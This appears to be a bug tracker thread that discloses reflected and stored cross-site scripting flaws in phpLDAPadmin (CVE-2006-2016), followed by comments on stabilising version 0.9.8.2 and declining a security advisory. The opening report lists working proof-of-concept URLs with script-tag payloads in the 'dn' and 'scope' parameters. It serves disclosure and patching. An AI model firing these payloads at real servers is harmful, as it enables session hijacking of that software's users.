Vuln. Description: phpLDAPadmin contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "dn" paremeter in "compare_form.php", "copy_form.php","rename_form.php","template_engine.php", "delete_form.php" isn't properly sanitised before being returned to the user. And input passed to "scope" parameter in "search.php" isn't properly sanitised before being returned to the user. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity. examples: /compare_form.php?server_id=0&dn=%22%3Cscript %3Ealert('r0t')%3C/script%3E /copy_form.php?server_id=0&dn=%22%3Cscript%3E alert('r0t')%3C/script%3E /rename_form.php?server_id=0&dn=%22%3Cscript %3Ealert('r0t')%3C/script%3E /template_engine.php?server_id=0&dn=%22%3Cs cript%3Ealert('r0t')%3C/script%3E /delete_form.php?server_id=0&dn=%22%3Cscript %3Ealert('r0t')%3C/script%3E /search.php?server_id=0&search=true&filter= objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3D example%2Cdc%3Dcom&form=advanced&scope=%22% 3Cscript%3Ealert('r0t')%3C/script%3E And there also script insertion vuln. or html injection: Like i say , take in example "/template_engine.php" and let input in Container DN : [XSS] Machine Name: [XSS] UID Number: [XSS] Those fields isn't sanitised before being stored in the vuln. system. This can be exploited to execute arbitrary script code in a user's browser session in context of an affected website when a malicious system entry is viewed. Rgds Daxomatic
x86 please test and mark at least version 0.9.8.2 stable, thank you
it's CVE-2006-2016
x86 please test and mark stable
0.9.8.2 stable on x86
Thx, ready for GLSa vote. I vote no, for XSS on non-typically-internet-facing webapp
Voting NO and closing. Feel free to reopen if you disagree.